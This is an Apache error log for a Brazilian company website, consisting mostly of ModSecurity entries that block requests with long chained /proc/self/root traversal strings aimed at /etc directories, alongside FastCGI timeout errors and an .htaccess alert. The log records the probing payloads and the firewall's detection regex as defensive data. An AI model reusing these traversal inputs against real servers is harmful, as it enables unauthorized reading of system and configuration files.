[Wed Mar 18 00:49:19.678302 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.243.128:58390] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dnsmasq.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogv0zinOy1jxa1j4e_kgAAARQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:49:23.688419 2026] [:error] [pid 17653:tid 140411599251200] [client 74.7.243.128:56226] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abogw8df6f5d65gmYZR9uAAAAtE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:49:29.832814 2026] [mime_magic:error] [pid 17887:tid 140411666392832] (70014)End of file found: [client 106.214.9.26:54718] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: http://bandeirantesbombas.com.br/wk/index.php
[Wed Mar 18 00:49:40.145907 2026] [proxy_fcgi:error] [pid 17653:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:54112] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:49:41.137536 2026] [:error] [pid 15826:tid 140411582465792] [client 74.7.243.128:56228] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abog1eoXxyEfFpUF8f8bGAAAAVM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:49:43.216129 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:39644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abog1-w_le52K8_3pV2OAwAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:50:02.418315 2026] [:error] [pid 11816:tid 140411565680384] [client 74.7.241.31:39644] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abog6uw_le52K8_3pV2OFQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:50:03.160124 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:54456] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:50:24.121874 2026] [proxy_fcgi:error] [pid 15051:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:54896] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:50:28.556678 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.241.31:60052] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abohBAkwaGbbGflqUZDB4QAAAMQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:50:47.877796 2026] [proxy_fcgi:error] [pid 31803:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:55272] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:51:12.125634 2026] [proxy_fcgi:error] [pid 19507:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:55732] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:51:35.142039 2026] [proxy_fcgi:error] [pid 26799:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:56124] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:51:58.127338 2026] [proxy_fcgi:error] [pid 31803:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:56532] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:52:04.293144 2026] [core:alert] [pid 19507:tid 140411708356352] [client 74.7.243.128:60654] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/lib/systemd/system
[Wed Mar 18 00:52:21.129789 2026] [proxy_fcgi:error] [pid 31803:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:56982] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:52:43.121802 2026] [proxy_fcgi:error] [pid 11816:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:57442] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:53:05.125807 2026] [proxy_fcgi:error] [pid 31803:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:57866] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:53:21.832297 2026] [:error] [pid 19507:tid 140411607643904] [client 74.7.241.31:43690] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abohsdY0UrI5A3LftIw9_gAAAZA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:53:28.133805 2026] [proxy_fcgi:error] [pid 11816:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58404] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:53:40.082479 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:34472] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abohxNa6ubjKNq_cu4ZEKAAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:53:51.062784 2026] [proxy_fcgi:error] [pid 19507:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:58854] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:54:13.141889 2026] [proxy_fcgi:error] [pid 15826:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:59272] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:54:41.131925 2026] [proxy_fcgi:error] [pid 15051:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:59838] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:54:58.543623 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.243.128:44448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiEvu8EFLIOrSqIpu3GgAAAlU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:55:02.249823 2026] [proxy_fcgi:error] [pid 15051:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:60308] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:55:24.129798 2026] [proxy_fcgi:error] [pid 29882:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:60676] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:55:40.635209 2026] [:error] [pid 17887:tid 140411741927168] [client 74.7.243.128:48974] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiPAkwaGbbGflqUZDCSwAAAMA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:55:46.122059 2026] [proxy_fcgi:error] [pid 15826:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:32880] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:55:49.635808 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:37206] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiRcdf6f5d65gmYZR-VwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:56:01.820361 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.241.31:53692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiUeyqAr6etmhZHNplOgAAAFg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:56:07.125933 2026] [proxy_fcgi:error] [pid 31803:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33296] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:56:08.152040 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:33102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiWCmAPhZkrhU8w4kegwAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:56:30.141885 2026] [proxy_fcgi:error] [pid 15826:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33802] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:56:31.217088 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.243.128:35812] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboib9a6ubjKNq_cu4ZEdwAAA0E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:56:42.051688 2026] [:error] [pid 17887:tid 140411599251200] [client 74.7.243.128:56002] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboieQkwaGbbGflqUZDCZAAAANE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:56:48.247553 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.243.128:33358] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboigNa6ubjKNq_cu4ZEfwAAA04"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 00:56:52.126335 2026] [proxy_fcgi:error] [pid 31803:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:34206] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:57:16.130209 2026] [proxy_fcgi:error] [pid 29882:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:34620] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:57:38.805633 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:60258] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboista6ubjKNq_cu4ZEmwAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 00:57:39.124216 2026] [proxy_fcgi:error] [pid 17653:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35094] AH01075: Error dispatching request to : (polling)
[Wed Mar 18 00:57:52.258997 2026] [:error] [pid 29882:tid 140411716749056] [client 74.7.241.31:49090] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aboiwEzinOy1jxa1j4fAZwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 00:58:02.114387 2026] [proxy_fcgi:error] [pid 17653:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:35592] AH01075: Error dispatching request to : (polling)
